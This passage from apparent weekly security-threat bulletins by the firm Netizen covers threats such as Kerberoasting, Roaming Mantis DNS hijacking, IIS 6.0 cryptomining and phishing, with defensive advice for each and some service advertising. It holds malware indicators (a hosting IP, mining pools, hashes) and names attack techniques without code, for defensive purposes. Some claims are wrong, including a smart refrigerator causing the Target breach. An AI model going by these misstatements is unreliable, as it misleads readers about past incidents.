The injected JavaScript replaces the victims bank account number with one of a false account created by the hackers. If the victim does not notice the swap, and authorizes the transaction, the attack is then successful.  BackSwap is attainted through spam, malicious attachments, and phishing emails. We recommend the following:

• Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
• Verify that the sender is actually from the company sending the message
• Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email—this is a huge red flag.
• Do not give out personal or company information.
• Review both signature and salutation.
• Do not click on attachments

Be wary of poor spelling, grammar, and formatting. As can be seen with the Dropbox phishing email, there are multiple spelling, grammar, and formatting errors, leading us to believe that the message is illegitimate. If an email is visually unprofessional, the sender is likely not who they say they are.

2. Z-Shave

Overview

The wireless communications protocol known as Z-Wave has been discovered to be vulnerable to a downgrade attack. This type of attack will allow an attack to intercept and tamper traffic in transit between smart devices. The attack known as Z-Shave operates by tricking two of these smart devices that are currently paring to one another into thinking that one of them does not support the newer S-Wave S2 security features, forcing the two smart devices to use the older, more vulnerable security standard. The exploitation can be a gateway for attackers into the organizations larger network.

Z-Wave is very popular among Internet of Things (IoT) devices as its blows Bluetooth out of the water with its superior range of up to 100 meters. It is currently estimated that Z-Wave operates on over 100 million IoT devices.

Recommendations

The most prominent recommendation we can provide, if utilizing Z-Wave on your IoT devices, is to upgrade and switch to the newest and most secure version of the protocol. We also recommend the following mitigations and strategies for securing IoT devices:

• Identify all IoT devices on the network, no matter how long it has been there. You cannot protect what you don’t know is there.

• Data flows should be documented to ascertain what is needed and what is unnecessary and does not add value. With this knowledge, the network can be segmented appropriately—firewalling off any unneeded traffic.

• Control the acquisition and implementation process—smart tv’s, fridges, etc. could open subtle channels for attackers to use to gain entry inside of the network. This happened in the well-known Target breach several years ago where a smart refrigerator was used to inject malware into the network and steal credit card numbers.

• Perform regular vulnerability assessments on internal and external networks to reveal any hidden weaknesses or openings into environment. These risks should then be reviewed at regular intervals, implementing mitigation strategies as feasible.

• Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.

How can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. DNS-Hijacking Malware
2. Kerberoasting
3. Mirai Botnet Evolved
4. Misconfigured Reverse Proxy Servers
5. Layered Backup Security to Combat Ransomware

1. DNS-Hijacking Malware

Overview

A new DNS-hijacking malware known as Roaming Mantis is being utilized to target Android devices, as well as iOS devices. The malware was initially found to hijack internet routers to distribute banking malware that would steal a user’s login credentials as well as the secret code used for multifactor authentication (MFA). In addition to Android targets, Roaming Mantis has begun phishing attacks for iOS devices and a cryptocurrency mining script for PC users.

The DNS-hijacking takes place when the hacker changes the DNS settings of the wireless routers to redirect traffic to malicious websites that are controlled by the hackers themselves. These malicious websites possess:

• Fake apps infected with banking malware to Android users,
• Phishing sites to iOS users,
• Sites with cryptocurrency mining scripts to desktop users

Recommendations

We recommend the following strategies to mitigate or prevent a breach:

• Ensure that your router is operating at its latest firmware version and protected with a strong and complex password.
• If at all possible, disable the router’s ability for remote administration. It would also be useful to hardcode a trusted DNS server into the OS network settings.
• Android users should install apps from official stores and disable the installation of applications from unknown sources.
• Perform routinely scheduled DNS settings checks of the DNS server address. If the DNS address does not match one you have specifically set or one from your provider, change it back to the appropriate one and change all account passwords immediately.

2. Kerberoasting

Overview

Kerberoasting is an effective method for extracting service account credentials from Active Directory as a regular user without sending any packets to the target system. This method is especially effective to those that employ poor passwords. The attack itself is geared towards tricking a popular authentication protocol used on Windows known as Kerberos.

There are several different types of Kerberos attacks ranging from recon (SPN Scanning), to offline service account password cracking (Kerberoast), to persistence (Silver & Golden Tickets). The vulnerability surfaces due to Microsoft’s legacy support in Active Directory for older systems and protocols (Windows NT, RC4 Kerberos, etc.).

Here are the most popular AD Kerberos attacks:

• SPN Scanning – finding services by requesting service principal names of a specific SPN class/type.
• Silver Ticket – forged Kerberos TGS service ticket
• Golden Ticket – forged Kerberos TGT authentication ticket
• MS14-068 Forged PAC Exploit – exploitation of the Kerberos vulnerability on Domain Controllers.
• Diamond PAC – blended attack type using elements of the Golden Ticket and the MS14-068 forged PAC.
• Skeleton Key In-memory Malware – malware “patches” the LSASS authentication process in-memory on Domain Controllers to enable a second, valid “skeleton key” password with which can be used to authenticate any domain account.

Recommendations

To protect yourself from being Kerberoasted, we recommend the following:

• Enforce strong passwords. Poor passwords are the root cause for Kerberoasting. Strong passwords should especially be enforced for service accounts associated with SPN’s.
• Utilize Microsoft’s “Managed Service accounts”. These types of accounts will automatically change passwords at determined intervals, lowering the usefulness of any cracked passwords.
• Employ endpoint protection in addition to having an up to date antivirus agent.
• Implement network monitoring for Kerberoasting attacks, such as scheduled vulnerability scanning.

3. Mirai Botnet Evolved

Overview

The Mirai Botnet, initially utilized to launch massive Distributed Denial of Service (DDoS) attacks, has since had its code modified to attack unpatched Internet of Things (IoT) devices; turning them into cryptocurrency miners and proxy servers for delivering malware.

Internet of Things is the networking of physical devices, appliances, and other items that have electronics, software, or sensors embedded within them that enables the connection of these objects to exchange data. Notable industries that possess this technology are healthcare and manufacturing. IoT devices continue to be a popular target for hackers as they often lack built-in security features and are most often installed and forgotten about.

Recommendations

Solutions for IoT devices are not always the easiest to implement—however there are actions that an organization can take to better protect their healthcare equipment and people:

• Identify all IoT devices on the network, no matter how long it has been there. You cannot protect what you don’t know is there.
• Data flows should be documented to ascertain what is needed and what is unnecessary and does not add value. With this knowledge, the network can be segmented appropriately—firewalling off any unneeded traffic.
• Control the acquisition and implementation process—smart tv’s, fridges, etc. could open subtle channels for attackers to use to gain entry inside of the network. This happened in the well-known Target breach several years ago where a smart refrigerator was used to inject malware into the network and steal credit card numbers.
• Perform regular vulnerability assessments on internal and external networks to reveal any hidden weaknesses or openings into environment. These risks should then be reviewed at regular intervals, implementing mitigation strategies as feasible.
• Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.

4. Misconfigured Reverse Proxy Servers

Overview

A proof of concept (PoC) attack has been discovered to allow unauthenticated users to extract user credentials from misconfigured reverse proxy servers in order to delete, manipulate, or extract data from websites and applications. Targets of the PoC attack include major cloud service providers (CSP) such as Amazon Web Services (AWS) MS Azure, and Google Cloud.

The PoC attack targets APIs that provide access to the metadata associated with identity services (AWS Identity and Access Management (IAM), MS Azure Managed Service Identity (MSI), and Google’s Cloud IAM).

Recommendations

When dealing with Cloud Service Providers, we offer a few recommendations to make sure your data is secure in the hands of someone else:

• Research your cloud solution. Vet the CSP and make sure they take the proper measures when it comes to securing customer data.
• Implement end-to-end encryption for your cloud storage. Typically uploaded and downloaded data is encrypted, however encrypted cloud storage is often overlooked.
• Perform routine patches and updates to in-house software. Unpatched systems can leave a wide opening for hackers to access information.
• Scrutinize your cloud configuration. Disable items not needed, or that are known vulnerabilities.

5. Layered Backup Security to Combat Ransomware

Overview

Ransomware attacks continue to make news. In just the last couple of months, high-profile victims included the city of Allentown and a school district in Massachusetts. Many attacks, though, go unreported or unmentioned to the media.

Ensuring your company is prepared for Disaster Recovery, whether it involves data hijacking or natural disasters, is crucial to all business planning.  Organizations as a whole should continue to follow the standard “3-2-1” backup plan:

• three different copies of data
• using two different media types
• one of which is off-site or offline.

How can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Threats:

Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

1. MFA Bypass
2. Windows IIS 6.0 Cryptomining
3. Malicious Chrome Extensions
4. Vulnerable PGP Tools
5. GDPR Phishing Scam

1. MFA Bypass

Overview

Two-factor authentication (2FA) or multi-factor authentication (MFA) are commonly used as an added layer of security for logins. The extra security proves beneficial when it comes to phishing attacks looking for a user’s password. MFA can be secure. However, hackers have discovered a way to spoof a login page, tricking the user into giving away their username, password, and MFA credentials; often they trick users by way of phishing campaigns. In short, the credentials taken from the spoofed site can be used to access the legitimate site.

Recommendations

Attackers will attempt to spoof a website and will try tricking a user to log into it. It is best practice to:

• Train users on the tell-tale signs of phishing emails and websites (improper formatting, grammar, style, lack of professional tone, etc.). Scrutinize emails, verify senders, and hover over links to see where they actually go.
• If possible, utilize Fast Identity Online (FIDO) authentication. FIDO stores personally identifiable information (PII) locally on the user’s device to protect it. FIDO also utilizes the Universal Second Factor (U2F) protocol, which creates a new key pair during registration with an online service and then retains the private key. The public key is then registered with the online service.

2. Windows IIS 6.0 Cryptomining

Overview

Windows Internet Information Services 6.0 possesses an open vulnerability that is being targeted to mine a cryptocurrency known as Electroneum. While this operating system had been declared to have reached its ‘end of life’ (EOL) three years ago, there are still operational systems online and vulnerable. Campaigns have been launched by the hacking group Lazarus, exploiting this vulnerability to install malware targeting specific organizations.

The campaign:

• The campaign targets Windows IIS 6.0 servers through a vulnerability (CVE-2017-7269) released over a year ago.
• The “Squiblydoo” technique is used to download and execute the malware.
• The author named the malware file “Isass.eXe”, likely to camouflage it as the legitimate Isass.exe process.
• The malware hosting server resides in Beijing, China, inside China Unicom’s network.

Recommendations

The recommend searching your systems for the following indicators of compromise:

Malware Hosting Server:

• 117[.]79[.]132[.]174

Mining pool addresses:

• electroneum.hashvault.pro:80
• etn-eu1.nanopool.org:13333
• etn-eu2.nanopool.org:13333
• etn-us-east1.nanopool.org:13333
• etn-us-west1.nanopool.org:13333
• etn-asia1.nanopool.org:13333
• etn-jp1.nanopool.org:13333
• etn-au1.nanopool.org:13333

Files:

• sct: c7b01b6a732b06174a1d36da46463e22
• eXe: 2f3ec555526902d25454d6bfc4495da7

We also recommend:

• Discontinuing the use of EOL software as much as feasible.
• Patch any critical vulnerabilities as soon as an update or patch is released.
• If patching is not an option consider using other forms of control, such as a Web Application Firewall (WAF).
• If at all possible, segment your network and do not allow vulnerable systems to touch the internet. If it has no business talking to the outside world then it should remain on the internal network.

3. Malicious Chrome Extensions

Overview

Malicious Google Chrome extensions have infected over 100,000 users. The extensions are pushed in links over Facebook, where it would lead victims to a fake YouTube page that would then ask for that particular extension to be installed. After the bad agent is installed in the victim’s Chrome browser, the extensions then execute JavaScript code, claiming the victim’s computer a part of a botnet. As a part of the botnet, the victim’s Facebook, among other social media content, credentials are stolen. Armed with the information of the user’s social media, the malicious links that started this whole process can then be delivered to the friends of the infected person.

To add insult to injury the botnet also installs cryptocurrency miners among other added measures to prevent an infected user from removing the malicious extensions. The extensions tab will close automatically upon opening and a variety of security tools that are normally offered by Facebook and Google, are blacklisted from running.

Recommendations

The following extensions should not be trusted or installed:

• Nigelify
• PwnerLike
• Alt-j
• Fix-case
• Divinity 2 Original Sin: Wiki Skill Popup
• Keeprivate
• iHabno

We also recommend not using any third-party chrome extensions if at all feasible. If they serve a valid business function that is required by the organization, then all extensions used either by the company or on the company network should be vetted and confirmed of legitimacy before use.

4. Vulnerable PGP Tools

Overview

Software vulnerabilities have been discovered in two email and data encrypting techniques: Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extensions S/MIME. The vulnerabilities open the possibility of encrypted data being read in plaintext, including past emails. Attackers exfiltrate data by first accessing these encrypted emails by way of network eavesdropping, compromising accounts, servers, backup systems, or client computers commonly by way of phishing. Once this has been accomplished the attacker will create exfil channels by abusing the active content of HTML emails (externally loaded images or styles) to retrieve through requested URLs. The threat exists in implementation errors and not the protocols themselves.

Recommendations

We recommend discontinuing, disabling, or uninstalling tools that automatically decrypt PGP-encrypted email, if at all feasible. We also recommend:

• Not using HTML mails if at all possible
• Disallow any access to external links if not required
• While a patch is not yet available, we recommend doing so for PGP and S/MIME controls as soon as it is released.

5. GDPR Phishing Scam

Overview

Apple users are being targeted by a phishing campaign that tricks users into updating their profiles, falsely claiming that the “update” is a preventative security hardening preparation of General Data Protection Regulation (GDPR) policies. GDPR is a legitimate happening set to take effect on May 25^th. The attack, if executed successfully, tricks users into disclosing their Apple account credentials to steal further personally information (credit card and other Apple account information).

A phishing email is sent with a malicious link that takes the user to a legitimate-looking Apple web page. The user is threatened to click the link or risk the suspension of a service to their account.

Recommendations

Phishing emails are all too common. This one, in particular, had the classic signs of intimidation/threats of taking something away from the user. While it has been said many times, users must always have security in mind with the internet, and so we recommend:

• Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
• Verify that the sender is actually from the company sending the message
• Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email—this is huge red flag.
• Do not give out personal or company information.
• Review both signature and salutation.
• Do not click on attachments

Do not click on unrecognized links. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as:

• Be wary of poor spelling, grammar, and formatting. As can be seen with the Dropbox phishing email, there are multiple spelling, grammar, and formatting errors, leading us to believe that the message is illegitimate. If an email is visually unprofessional, the sender is likely not who they say they are.
• Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action or that is addressing you in a threatening manner should be questionable. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Staff Pay Raises 2018” may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.

How can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.